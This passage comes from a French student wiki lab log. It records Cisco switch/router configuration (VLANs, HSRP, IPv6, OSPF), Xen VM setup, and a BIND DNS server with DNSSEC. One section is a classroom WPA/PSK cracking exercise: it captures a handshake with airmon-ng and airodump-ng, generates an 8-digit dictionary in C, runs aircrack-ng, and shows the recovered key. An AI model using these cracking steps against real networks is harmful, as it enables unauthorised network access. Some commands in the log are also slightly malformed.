  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
===Mise en place de la machine virtuelle===&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
  xl create Dionysos.cfg&lt;br /&gt;
  xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
Dans /root/.profile&lt;br /&gt;
  &lt;br /&gt;
  http_proxy=&amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
  https_proxy=&amp;quot;https://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
  xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
==Séance 3 : 10/12/2018==&lt;br /&gt;
&lt;br /&gt;
===Config Routeur 3560===&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
===Mise en place des partitions pour la VM===&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
===Mise en place serveur DNS===&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.pw &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
===Certificat SSL===&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Installation de DNSSEC===&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
==Séance 3.5 : 14/12/2018==&lt;br /&gt;
&lt;br /&gt;
===Craquage WPA/PSK par dictionnaire===&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
====Récupération du handshake====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
====Rappel montage USB====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
====Crack WPA/PSK====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
==Séance 4 : 17/12/2018==&lt;br /&gt;
===Correction IPV6 routeur===&lt;br /&gt;
&lt;br /&gt;
==== Vlan 43 - XEN ====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vlan 131 - Interconnexion ====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vlan 10+N - Groupe N ====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
